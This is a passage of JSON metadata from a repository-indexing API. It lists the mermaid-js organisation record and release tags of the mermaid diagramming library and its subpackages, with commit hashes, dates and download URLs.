epos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/